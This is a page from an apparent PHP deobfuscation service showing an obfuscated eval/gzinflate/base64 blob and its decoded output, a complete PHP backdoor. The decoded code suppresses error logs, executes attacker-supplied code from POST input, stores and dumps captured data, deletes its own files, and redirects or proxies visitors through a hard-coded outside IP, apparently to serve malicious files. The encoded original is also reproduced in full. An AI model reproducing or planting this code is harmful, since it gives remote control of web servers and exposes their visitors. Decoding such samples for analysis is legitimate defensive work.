Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode("DZZFrsUIskT30qMqeWAmffXAzPY1w6RlZmav/r8VpDIjI+KUVzr8U3..

Decoded Output download

@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r']))
{
	print $_GET['r'];
}

elseif (isset($_GET['x']))
{
	@unlink('default.log');
	@unlink('default.tmp');
	@unlink('default.txt');
	@unlink('default.php');

	print $_GET['x'];
}

elseif (isset($_POST['e']))
{
	eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
}

elseif (strlen($_POST['num'])==12 && isset($_POST['buffer']) && $_POST['option']=='g')
{
	$fp=@fopen('default.log','a');
	@flock($fp,LOCK_EX);
	@fputs($fp,$_POST['buffer']."
");
	@flock($fp,LOCK_UN);
	@fclose($fp);
}

elseif (isset($_GET['up']))
{
	print file_get_contents('default.log');

	$fp=@fopen('default.log','w');
	@flock($fp,LOCK_EX);
	@fputs($fp,'');
	@flock($fp,LOCK_UN);
	@fclose($fp);
}

elseif (preg_match('/^\/([a-z]{4})[.]html/i', $_SERVER['REQUEST_URI']))
{
	$doms = @file_get_contents('default.txt');

	if (time()-@filemtime('default.tmp') > 10) @unlink('default.tmp');

	if (time()-@filemtime('default.txt') > 60 && !@file_exists('default.tmp'))
	{
		$fp = @fopen ('default.tmp', 'w');
		@flock($fp, LOCK_EX);
		@fputs($fp, time());
		@flock($fp, LOCK_UN);
		@fclose($fp);

		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206/index.php?u='.mt_rand(1000,9999));
		curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_VERBOSE, 0);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		curl_setopt($ch, CURLOPT_TIMEOUT, 7);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
		$doms = curl_exec($ch);
		curl_close($ch);

		if (strlen($doms) > 0)
		{
			$fp = @fopen ('default.txt', 'w');
			@flock($fp, LOCK_EX);
			@fputs($fp, $doms);
			@flock($fp, LOCK_UN);
			@fclose($fp);
		}

		@unlink('default.tmp');
	}

	if (strlen($doms) > 0)
	{
		$doms = explode("
",trim(str_replace("
", "", $doms)));

		shuffle($doms);

		$url = 'http://'.$doms[0].str_replace('.html','.htm',$_SERVER['REQUEST_URI']);

		header('HTTP/1.1 301 Moved Permanently');
		header('Location: '.$url);

		print '<html><head><meta http-equiv="refresh" content="0;url='.$url.'"></head><body><script type="text/javascript">window.location="'.$url.'";</script></body></html>';
	}
}

elseif (preg_match('/^\/([a-z0-9]{1,4})[.](htm|pdf|jar)/i', $_SERVER['REQUEST_URI']))
{
	if (isset($_SERVER['HTTP_X_REAL_IP'])) $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_REAL_IP'];

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206' . $_SERVER['REQUEST_URI']);
	curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_VERBOSE, 0);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
	curl_setopt($ch, CURLOPT_TIMEOUT, 7);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
	curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);

	$page = curl_exec($ch);

	curl_close($ch);

	if (strlen($page) > 0)
	{
		$page = str_replace ("HTTP/1.1 100 Continue

", '', $page);
	
		list($headers, $page) = explode("

", $page, 2);
	
		$headers = explode("
", trim($headers));

		foreach ($headers as $header) if (preg_match('/(HTTP|Expires|Content|Cache|Pragma|Location)/Usi', $header)) header($header);
	
		print $page;
	}
}

exit;

Did this file decode correctly?

Original Code

<?php eval(gzinflate(base64_decode("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"))); ?>

Function Calls

gzinflate 27
base64_decode 27

Variables

None

Stats

MD5 dc5d9fd86de39292f12f0aeb351fa8b2
Eval Count 27
Decode Time 113 ms